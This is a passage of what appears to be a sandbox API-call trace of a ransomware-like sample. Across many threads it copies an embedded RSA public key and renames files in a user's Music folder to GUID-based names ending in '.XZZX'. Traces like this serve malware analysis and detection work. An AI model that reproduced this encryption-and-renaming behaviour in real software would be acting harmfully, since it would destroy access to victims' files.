LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.428] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0186.428] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.428] SetErrorMode (uMode=0x1) returned 0x1 [0186.428] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0186.428] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x53f086b3, Data2=0x2539, Data3=0x484a, Data4=([0]=0x99, [1]=0xc0, [2]=0xef, [3]=0x68, [4]=0xc7, [5]=0x82, [6]=0x5e, [7]=0x3c))) returned 0x0 [0186.428] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned 96 [0186.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0186.428] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\7405DCDB0A82CA7A53F086B30D2DAEC2.XZZX") returned 96 [0186.428] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 687 os_tid = 0xcc0 [0186.583] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.583] lstrcpyW (in: lpString1=0x2aaf460, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0186.583] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.583] SetErrorMode (uMode=0x1) returned 0x1 [0186.583] lstrcpyW (in: lpString1=0x2aaf860, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0186.583] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xc42562a, Data2=0x1899, Data3=0x47eb, Data4=([0]=0xa1, [1]=0x6, [2]=0x37, [3]=0xb3, [4]=0xf2, [5]=0x9d, [6]=0x51, [7]=0x28))) returned 0x0 [0186.583] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned 96 [0186.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0186.583] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\8BB96F1A06E903730C42562A0993E7BB.XZZX") returned 96 [0186.583] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 688 os_tid = 0xcc4 [0186.739] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.739] lstrcpyW (in: lpString1=0x2aaf460, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0186.740] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.740] SetErrorMode (uMode=0x1) returned 0x1 [0186.740] lstrcpyW (in: lpString1=0x2aaf860, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0186.740] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xc0bc7c18, Data2=0xfd1d, Data3=0x493b, Data4=([0]=0xbf, [1]=0xf2, [2]=0xea, [3]=0xe3, [4]=0xd5, [5]=0x4e, [6]=0xb9, [7]=0xd3))) returned 0x0 [0186.740] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\E003588E3DA0B59DC1493EC641B899E5.XZZX") returned 96 [0186.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0186.740] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\1BFDC6B848679AAFC0BC7C184B127EF7.XZZX") returned 96 [0186.740] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 689 os_tid = 0xcc8 [0186.895] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.895] lstrcpyW (in: lpString1=0x2aaf460, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0186.895] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.895] SetErrorMode (uMode=0x1) returned 0x1 [0186.895] lstrcpyW (in: lpString1=0x2aaf860, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0186.895] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x4ec79e49, Data2=0xada2, Data3=0x4e4b, Data4=([0]=0x9d, [1]=0xd3, [2]=0xba, [3]=0x6c, [4]=0xc0, [5]=0xee, [6]=0xdd, [7]=0x8e))) returned 0x0 [0186.895] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\EED603F80D860CC870D6498A119DF110.XZZX") returned 96 [0186.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0186.895] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\C0497F32351A3A764EC79E4937C51EBE.XZZX") returned 96 [0186.895] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 690 os_tid = 0xccc [0187.054] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.054] lstrcpyW (in: lpString1=0x2aaf460, lpString2="06C3ECFB13862898AA23710517BB0CE0.XZZX" | out: lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX") returned="06C3ECFB13862898AA23710517BB0CE0.XZZX" [0187.054] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.054] SetErrorMode (uMode=0x1) returned 0x1 [0187.054] lstrcpyW (in: lpString1=0x2aaf860, lpString2="06C3ECFB13862898AA23710517BB0CE0.XZZX" | out: lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX") returned="06C3ECFB13862898AA23710517BB0CE0.XZZX" [0187.054] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x6811514c, Data2=0xc473, Data3=0x4583, Data4=([0]=0x88, [1]=0xd0, [2]=0x67, [3]=0x3e, [4]=0x20, [5]=0x6e, [6]=0x1f, [7]=0x1e))) returned 0x0 [0187.054] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\06C3ECFB13862898AA23710517BB0CE0.XZZX") returned 110 [0187.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0187.054] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\0205B524355785D96811514C38026A21.XZZX") returned 110 [0187.054] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 691 os_tid = 0xcd0 [0187.207] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.207] lstrcpyW (in: lpString1=0x2aaf460, lpString2="38DC595E3788A5BA7503B1493BA98A02.XZZX" | out: lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX") returned="38DC595E3788A5BA7503B1493BA98A02.XZZX" [0187.207] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.207] SetErrorMode (uMode=0x1) returned 0x1 [0187.207] lstrcpyW (in: lpString1=0x2aaf860, lpString2="38DC595E3788A5BA7503B1493BA98A02.XZZX" | out: lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX") returned="38DC595E3788A5BA7503B1493BA98A02.XZZX" [0187.207] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xc824ac65, Data2=0x6344, Data3=0x4c3e, Data4=([0]=0x95, [1]=0x27, [2]=0xa7, [3]=0x3c, [4]=0x7b, [5]=0xf0, [6]=0x4a, [7]=0x85))) returned 0x0 [0187.207] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\38DC595E3788A5BA7503B1493BA98A02.XZZX") returned 110 [0187.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0187.207] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\5868D9D41D903A78C824AC65203B1EC0.XZZX") returned 110 [0187.207] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 692 os_tid = 0xcd4 [0187.363] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.363] lstrcpyW (in: lpString1=0x2aaf460, lpString2="3C85A2C827B882D0AC42F6272BD96718.XZZX" | out: lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX") returned="3C85A2C827B882D0AC42F6272BD96718.XZZX" [0187.363] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.363] SetErrorMode (uMode=0x1) returned 0x1 [0187.363] lstrcpyW (in: lpString1=0x2aaf860, lpString2="3C85A2C827B882D0AC42F6272BD96718.XZZX" | out: lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX") returned="3C85A2C827B882D0AC42F6272BD96718.XZZX" [0187.363] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x8b1b563, Data2=0x4efd, Data3=0x4929, Data4=([0]=0x96, [1]=0xd3, [2]=0xdf, [3]=0xd6, [4]=0x2, [5]=0x3c, [6]=0xab, [7]=0x23))) returned 0x0 [0187.363] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\3C85A2C827B882D0AC42F6272BD96718.XZZX") returned 110 [0187.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0187.363] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BCE46CD71692CB8508B1B563193DAFCD.XZZX") returned 110 [0187.363] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 693 os_tid = 0xcd8 [0187.519] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.519] lstrcpyW (in: lpString1=0x2aaf460, lpString2="64527B001382D7BF4D0A170017B7BC07.XZZX" | out: lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX") returned="64527B001382D7BF4D0A170017B7BC07.XZZX" [0187.519] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.519] SetErrorMode (uMode=0x1) returned 0x1 [0187.519] lstrcpyW (in: lpString1=0x2aaf860, lpString2="64527B001382D7BF4D0A170017B7BC07.XZZX" | out: lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX") returned="64527B001382D7BF4D0A170017B7BC07.XZZX" [0187.519] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x66d74049, Data2=0xb6dd, Data3=0x42e6, Data4=([0]=0x93, [1]=0x5a, [2]=0xbc, [3]=0xb9, [4]=0xae, [5]=0xf7, [6]=0xa2, [7]=0x37))) returned 0x0 [0187.519] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\64527B001382D7BF4D0A170017B7BC07.XZZX") returned 110 [0187.519] MultiByteToWideChar (in: CodePage=0x0, 